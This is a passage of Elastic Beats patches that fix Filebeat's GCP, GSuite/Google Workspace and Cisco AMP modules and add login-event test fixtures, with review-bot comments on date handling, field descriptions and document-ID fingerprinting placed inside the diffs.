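pipeline defines outside the hunk.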
--- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -201,6 +201,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix `google_workspace` pagination. {pull}24668[24668] - Fix netflow module ignoring detect_sequence_reset flag. {issue}24268[24268] {pull}24270[24270] - Fix Cisco ASA parser for message 302022. {issue}24405[24405] {pull}24697[24697] +- Fix gcp/vpcflow module error where input type was defaulting to file. {pull}24719[24719] *Heartbeat* diff --git a/x-pack/filebeat/module/gcp/vpcflow/manifest.yml b/x-pack/filebeat/module/gcp/vpcflow/manifest.yml index 1f67548e0dbd..4cd314d574f6 100644 --- a/x-pack/filebeat/module/gcp/vpcflow/manifest.yml +++ b/x-pack/filebeat/module/gcp/vpcflow/manifest.yml @@ -2,7 +2,7 @@ module_version: "1.0" var: - name: input - default: google-pubsub + default: gcp-pubsub - name: project_id default: SET_PROJECT_NAME - name: topic From d002be88111c84c40669aa7f3849e175fdfe8345 Mon Sep 17 00:00:00 2001 From: Andrew Kroh Date: Wed, 24 Mar 2021 17:24:15 -0400 Subject: [PATCH 11/20] [Filebeat] Fix date parsing in GSuite/Google Workspace modules (#24696) (#24736) * Fix date parsing in GSuite/login fileset The format of Date#toUTCString was incompatible with the format accepted by Elasticsearch by default. By writing a Date object from the JS pipeline this becomes a time.Time in the event that is formatted by common.Time when going out as JSON. Fixes #24694 * Apply fix to google_workspace Fixes #24692 (cherry picked from commit a4a3ff0c8f85c9b4e8e00cda57af6036b3a66678) --- CHANGELOG.next.asciidoc | 4 +- .../google_workspace/login/config/pipeline.js | 2 +- .../test/login-test.json.log-expected.json | 225 ++++++++++++++++++ .../module/gsuite/login/config/pipeline.js | 2 +- .../gsuite-login-test.json.log-expected.json | 209 ++++++++++++++++ 5 files changed, 437 insertions(+), 5 deletions(-) diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 4d95d7ff6db6..5996e2490954 100644 
--- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -201,6 +201,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix `google_workspace` pagination. {pull}24668[24668] - Fix netflow module ignoring detect_sequence_reset flag. {issue}24268[24268] {pull}24270[24270] - Fix Cisco ASA parser for message 302022. {issue}24405[24405] {pull}24697[24697] +- Fix date parsing in GSuite/login and Google Workspace/login filesets. {issue}24694[24694] - Fix gcp/vpcflow module error where input type was defaulting to file. {pull}24719[24719] *Heartbeat* @@ -209,9 +210,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fixed scheduler shutdown issues which would in rare situations cause a panic due to semaphore misuse. {pull}16397[16397] - Fixed TCP TLS checks to properly validate hostnames, this broke in 7.x and only worked for IP SANs. {pull}17549[17549] -*Heartbeat* - - *Journalbeat* diff --git a/x-pack/filebeat/module/google_workspace/login/config/pipeline.js b/x-pack/filebeat/module/google_workspace/login/config/pipeline.js index 9f9610393f1c..a7b54afd43e0 100644 --- a/x-pack/filebeat/module/google_workspace/login/config/pipeline.js +++ b/x-pack/filebeat/module/google_workspace/login/config/pipeline.js @@ -64,7 +64,7 @@ var login = (function () { // this is a timestamp in microseconds case "timestamp": var millis = p.intValue / 1000; - evt.Put("event.start", new Date(millis).toUTCString()); + evt.Put("event.start", new Date(millis)); break; case "challenge_status": if (p.value === "Challenge Passed") { diff --git a/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json index 48f7038df80e..a4e0f4800403 100644 --- a/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json 
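Review bot: `new Date(millis)` on the changed line produces an Invalid Date whenever `p.intValue` is absent or non-numeric, because `millis` is computed by plain division two lines above with no check; what `evt.Put` does with an invalid Date is not visible here, but emitting one into `event.start` from an API record is not something to leave to chance. A guard such as `if (isNaN(millis)) break;` between the division and the `evt.Put` leaves the field unset instead. The enclosing `login` function starts and ends outside this hunk.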
+++ b/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json 
@@ -55,6 +55,174 @@ "user.target.email": "foo@elastic.co", "user.target.name": "foo" }, + { + "@timestamp": "2020-10-02T15:00:00.000Z", + "event.action": "suspicious_login", + "event.category": [ + "authentication" + ], + "event.dataset": "google_workspace.login", + "event.id": "1", + "event.module": "google_workspace", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "info" + ], + "fileset.name": "login", + "google_workspace.actor.type": "USER", + "google_workspace.event.type": "account_warning", + "google_workspace.kind": "admin#reports#activity", + "google_workspace.login.affected_email_address": "foo@elastic.co", + "google_workspace.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 406, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "google_workspace", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": -77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + "source.user.email": "foo@bar.com", + 
"source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "elastic.co", + "user.target.email": "foo@elastic.co", + "user.target.name": "foo" + }, + { + "@timestamp": "2020-10-02T15:00:00.000Z", + "event.action": "suspicious_login_less_secure_app", + "event.category": [ + "authentication" + ], + "event.dataset": "google_workspace.login", + "event.id": "1", + "event.module": "google_workspace", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login_less_secure_app\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "info" + ], + "fileset.name": "login", + "google_workspace.actor.type": "USER", + "google_workspace.event.type": "account_warning", + "google_workspace.kind": "admin#reports#activity", + "google_workspace.login.affected_email_address": "foo@elastic.co", + "google_workspace.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 853, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "google_workspace", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": 
-77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + "source.user.email": "foo@bar.com", + "source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "elastic.co", + "user.target.email": "foo@elastic.co", + "user.target.name": "foo" + }, + { + "@timestamp": "2020-10-02T15:00:00.000Z", + "event.action": "suspicious_programmatic_login", + "event.category": [ + "authentication" + ], + "event.dataset": "google_workspace.login", + "event.id": "1", + "event.module": "google_workspace", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_programmatic_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "info" + ], + "fileset.name": "login", + "google_workspace.actor.type": "USER", + "google_workspace.event.type": "account_warning", + "google_workspace.kind": "admin#reports#activity", + "google_workspace.login.affected_email_address": "foo@elastic.co", + "google_workspace.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 1316, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "google_workspace", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + 
"source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": -77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + "source.user.email": "foo@bar.com", + "source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "elastic.co", + "user.target.email": "foo@elastic.co", + "user.target.name": "foo" + }, { "@timestamp": "2020-10-02T15:00:00.000Z", "event.action": "account_disabled_generic", 
@@ -223,6 +391,63 @@ "user.target.email": "foo@elastic.co", "user.target.name": "foo" }, + { + "@timestamp": "2020-10-02T15:00:00.000Z", + "event.action": "account_disabled_hijacked", + "event.category": [ + "authentication" + ], + "event.dataset": "google_workspace.login", + "event.id": "1", + "event.module": "google_workspace", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_hijacked\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "user", + "change" + ], + "fileset.name": "login", + "google_workspace.actor.type": "USER", + "google_workspace.event.type": "account_warning", + "google_workspace.kind": "admin#reports#activity", + "google_workspace.login.affected_email_address": "foo@elastic.co", + "google_workspace.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 2992, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "google_workspace", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": -77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + 
"source.user.email": "foo@bar.com", + "source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "elastic.co", + "user.target.email": "foo@elastic.co", + "user.target.name": "foo" + }, { "@timestamp": "2020-10-02T15:00:00.000Z", "event.action": "gov_attack_warning", diff --git a/x-pack/filebeat/module/gsuite/login/config/pipeline.js b/x-pack/filebeat/module/gsuite/login/config/pipeline.js index 0fb518b351df..2ad5d52f7de8 100644 --- a/x-pack/filebeat/module/gsuite/login/config/pipeline.js +++ b/x-pack/filebeat/module/gsuite/login/config/pipeline.js @@ -64,7 +64,7 @@ var login = (function () { // this is a timestamp in microseconds case "timestamp": var millis = p.intValue / 1000; - evt.Put("event.start", new Date(millis).toUTCString()); + evt.Put("event.start", new Date(millis)); break; case "challenge_status": if (p.value === "Challenge Passed") { diff --git a/x-pack/filebeat/module/gsuite/login/test/gsuite-login-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/login/test/gsuite-login-test.json.log-expected.json index 261bf54dbf6c..9bc77dc7d039 100644 --- a/x-pack/filebeat/module/gsuite/login/test/gsuite-login-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/login/test/gsuite-login-test.json.log-expected.json 
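Review bot: In the gsuite pipeline hunk, `new Date(millis)` yields an Invalid Date when `p.intValue` is missing or non-numeric, since `millis` comes from an unchecked division on the context line above; how `evt.Put` serialises an invalid Date is not visible here, so it is safer not to write one into `event.start`. Adding `if (isNaN(millis)) break;` before the `evt.Put` keeps the field absent in that case, mirroring what a missing parameter would do. The enclosing `login` function starts and ends outside this hunk.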
@@ -51,6 +51,162 @@ "user.id": "1", "user.name": "foo" }, + { + "event.action": "suspicious_login", + "event.category": [ + "authentication" + ], + "event.dataset": "gsuite.login", + "event.id": "1", + "event.module": "gsuite", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "info" + ], + "fileset.name": "login", + "gsuite.actor.type": "USER", + "gsuite.event.type": "account_warning", + "gsuite.kind": "admin#reports#activity", + "gsuite.login.affected_email_address": "foo@elastic.co", + "gsuite.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 406, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "gsuite", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": -77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + "source.user.email": "foo@bar.com", + "source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" + }, + { + 
"event.action": "suspicious_login_less_secure_app", + "event.category": [ + "authentication" + ], + "event.dataset": "gsuite.login", + "event.id": "1", + "event.module": "gsuite", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login_less_secure_app\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "info" + ], + "fileset.name": "login", + "gsuite.actor.type": "USER", + "gsuite.event.type": "account_warning", + "gsuite.kind": "admin#reports#activity", + "gsuite.login.affected_email_address": "foo@elastic.co", + "gsuite.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 853, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "gsuite", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": -77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + "source.user.email": "foo@bar.com", + "source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" + }, + { + "event.action": 
"suspicious_programmatic_login", + "event.category": [ + "authentication" + ], + "event.dataset": "gsuite.login", + "event.id": "1", + "event.module": "gsuite", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_programmatic_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "info" + ], + "fileset.name": "login", + "gsuite.actor.type": "USER", + "gsuite.event.type": "account_warning", + "gsuite.kind": "admin#reports#activity", + "gsuite.login.affected_email_address": "foo@elastic.co", + "gsuite.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 1316, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "gsuite", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": -77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + "source.user.email": "foo@bar.com", + "source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" + }, { "event.action": "account_disabled_generic", "event.category": 
[ 
@@ -207,6 +363,59 @@ "user.id": "1", "user.name": "foo" }, + { + "event.action": "account_disabled_hijacked", + "event.category": [ + "authentication" + ], + "event.dataset": "gsuite.login", + "event.id": "1", + "event.module": "gsuite", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_hijacked\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "user", + "change" + ], + "fileset.name": "login", + "gsuite.actor.type": "USER", + "gsuite.event.type": "account_warning", + "gsuite.kind": "admin#reports#activity", + "gsuite.login.affected_email_address": "foo@elastic.co", + "gsuite.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 2992, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "gsuite", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": -77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + "source.user.email": "foo@bar.com", + "source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + 
"user.name": "foo" + }, { "event.action": "gov_attack_warning", "event.category": [ From 9f05d498b6a12dacfe775ee54e699396a2f2ddda Mon Sep 17 00:00:00 2001 
From: Andrew Kroh Date: Wed, 24 Mar 2021 19:10:37 -0400 Subject: [PATCH 12/20] [Filebeat][Cisco AMP] Pipeline fixes for related mac/ip and mitre tactics fields. (#24661) (#24753) * changing foreach processors to remove null value fields from related fields * splitting up test files and fixing document_id generation, and some field typos * removing lines from painless script that isn't really necessary * mage fmt update to format python code * reverting CI changes for now, will be moved to separate PR * reduce test logs and add fixes to pipeline * update changelog (cherry picked from commit 45cd39448df9211f14b32871c80cc44fe9818b76) Co-authored-by: Marius Iversen --- CHANGELOG.next.asciidoc | 1 + filebeat/docs/fields.asciidoc | 42 +- .../module/cisco/amp/_meta/fields.yml | 24 +- .../module/cisco/amp/config/config.yml | 6 +- .../module/cisco/amp/ingest/pipeline.yml | 64 +- .../cisco/amp/test/cisco_amp.ndjson.log | 8 - .../test/cisco_amp.ndjson.log-expected.json | 87 - .../cisco/amp/test/cisco_amp1.ndjson.log | 49 + .../test/cisco_amp1.ndjson.log-expected.json | 2356 ++++++++ .../cisco/amp/test/cisco_amp2.ndjson.log | 922 +-- .../test/cisco_amp2.ndjson.log-expected.json | 5290 +++-------------- .../cisco/amp/test/cisco_amp3.ndjson.log | 45 + .../test/cisco_amp3.ndjson.log-expected.json | 2828 +++++++++ .../cisco/amp/test/cisco_amp4.ndjson.log | 100 + .../test/cisco_amp4.ndjson.log-expected.json | 3294 ++++++++++ .../cisco/amp/test/cisco_amp5.ndjson.log | 62 + .../test/cisco_amp5.ndjson.log-expected.json | 2575 ++++++++ .../cisco/amp/test/cisco_amp6.ndjson.log | 53 + .../test/cisco_amp6.ndjson.log-expected.json | 2425 ++++++++ .../cisco/amp/test/cisco_amp7.ndjson.log | 49 + .../test/cisco_amp7.ndjson.log-expected.json | 2349 ++++++++ x-pack/filebeat/module/cisco/fields.go | 2 +- 22 files changed, 17092 insertions(+), 5539 deletions(-) delete mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log delete mode 100644 
x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log-expected.json create mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log create mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json create mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log create mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log-expected.json create mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log create mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json create mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log create mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json create mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log create mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json create mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log create mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 5996e2490954..341fe104bdc4 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -397,6 +397,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Keep cursor state between httpjson input restarts {pull}20751[20751] - New juniper.srx dataset for Juniper SRX logs. {pull}20017[20017] - Added DNS response IP addresses to `related.ip` in Suricata module. {pull}22291[22291] +- Updating field mappings for Cisco AMP module, fixing certain fields. {pull}24661[24661] *Heartbeat* diff --git a/filebeat/docs/fields.asciidoc b/filebeat/docs/fields.asciidoc index a484eab015c8..c41cc67fb652 100644 --- a/filebeat/docs/fields.asciidoc +++ b/filebeat/docs/fields.asciidoc 
@@ -21078,7 +21078,7 @@ type: keyword
 
 --
 
-*`cisco.amp.file.archived_file.identify.sha256`*::
+*`cisco.amp.file.archived_file.identity.sha256`*::
 +
 --
 SHA256 hash of the archived file related to the malicious event.
@@ -21288,12 +21288,52 @@ type: flattened
 
 --
 
+*`cisco.amp.mitre_tactics`*::
++
+--
+Array of all related mitre tactic ID's
+
+
+type: keyword
+
+--
+
 *`cisco.amp.techniques`*::
 +
 --
 List of all MITRE techniques related to the incident found.
 
 
+type: flattened
+
+--
+
+*`cisco.amp.mitre_techniques`*::
++
+--
+Array of all related mitre technique ID's
+
+
+type: keyword
+
+--
+
+*`cisco.amp.command_line.arguments`*::
++
+--
+The CLI arguments related to the Cloud Threat IOC reported by Cisco.
+
+
+type: keyword
+
+--
+
+*`cisco.amp.bp_data`*::
++
+--
+Endpoint isolation information
+
+
 type: flattened
 
 --
diff --git a/x-pack/filebeat/module/cisco/amp/_meta/fields.yml b/x-pack/filebeat/module/cisco/amp/_meta/fields.yml
index de20fe61484f..ff246eeaa45f 100644
--- a/x-pack/filebeat/module/cisco/amp/_meta/fields.yml
+++ b/x-pack/filebeat/module/cisco/amp/_meta/fields.yml
@@ -160,7 +160,7 @@
     description: >
       SHA1 hash of the archived file related to the malicious event.
 
-  - name: file.archived_file.identify.sha256
+  - name: file.archived_file.identity.sha256
     type: keyword
     description: >
       SHA256 hash of the archived file related to the malicious event.
@@ -265,7 +265,27 @@
     description: >
       List of all MITRE tactics related to the incident found.
 
+  - name: mitre_tactics
+    type: keyword
+    description: >
+      Array of all related mitre tactic ID's
+
   - name: techniques
     type: flattened
     description: >
-      List of all MITRE techniques related to the incident found.
\ No newline at end of file
+      List of all MITRE techniques related to the incident found.
+
+  - name: mitre_techniques
+    type: keyword
+    description: >
+      Array of all related mitre technique ID's
+
+  - name: command_line.arguments
+    type: keyword
+    description: >
+      The CLI arguments related to the Cloud Threat IOC reported by Cisco.
+
+  - name: bp_data
+    type: flattened
+    description: >
+      Endpoint isolation information
\ No newline at end of file
diff --git a/x-pack/filebeat/module/cisco/amp/config/config.yml b/x-pack/filebeat/module/cisco/amp/config/config.yml
index 8e4695d7458b..0aa38440947e 100644
--- a/x-pack/filebeat/module/cisco/amp/config/config.yml
+++ b/x-pack/filebeat/module/cisco/amp/config/config.yml
@@ -62,14 +62,14 @@ processors:
       fields: [message]
       target: json
   - if:
-      has_fields: ["json.data.id"]
+      has_fields: ["json.data.detection_id"]
     then:
       - fingerprint:
-          fields: ["json.data.id"]
+          fields: ["json.data.detection_id"]
           target_field: "@metadata._id"
     else:
       - fingerprint:
-          fields: ["json.data.timestamp", "json.data.event_type_id", "json.data.connector_guid"]
+          fields: ["json.data.timestamp", "json.data.timestamp_nanoseconds", "json.data.event_type_id", "json.data.connector_guid"]
           target_field: "@metadata._id"
   - add_fields:
       target: ''
diff --git a/x-pack/filebeat/module/cisco/amp/ingest/pipeline.yml b/x-pack/filebeat/module/cisco/amp/ingest/pipeline.yml
index b77c3be1f9cd..b75214cc2972 100644
--- a/x-pack/filebeat/module/cisco/amp/ingest/pipeline.yml
+++ b/x-pack/filebeat/module/cisco/amp/ingest/pipeline.yml
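Review bot: The descriptions added for `mitre_tactics` and `mitre_techniques` do not say how they relate to the existing `tactics`/`techniques` fields, so a reader of the field reference cannot tell which one to query. Elsewhere in this patch the pipeline moves the value into the `mitre_*` field only when the source list holds plain ID strings, with object-form entries staying in the flattened field, and that split belongs in the description, e.g. `Array of related MITRE tactic IDs; populated when the event reports tactics as plain ID strings, otherwise the objects stay in cisco.amp.tactics.` The same wording applies to `mitre_techniques`, and `ID's` should read `IDs` in both entries.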
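Review bot: Deriving `@metadata._id` from `json.data.detection_id` alone turns every event that shares a detection_id into the same document, and the sample file this patch deletes holds a Threat Detected and a Threat Quarantined event with the identical detection_id `12365423467` but different `event_type_id`; under this change the later one replaces the earlier or is rejected as a duplicate instead of being indexed beside it, which loses the quarantine outcome an analyst needs to see. If the detection_id is shared across the lifecycle of one detection, as that sample suggests, the fingerprint should also cover the event type, `fields: ["json.data.detection_id", "json.data.event_type_id"]`; if it is guaranteed unique per event, a comment next to `has_fields` saying so would settle it. The move away from `json.data.id` looks motivated by the large numeric ids in the new samples losing precision as floats (`6411425813945647000` next to detection_id `6411425813945647105`), which is worth a sentence in the changelog entry.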
@@ -76,6 +76,15 @@ processors:
     ignore_failure: true
     if: ctx?.cisco?.amp?.start_timestamp != null
 
+- rename:
+    field: cisco.amp.techniques
+    target_field: cisco.amp.mitre_techniques
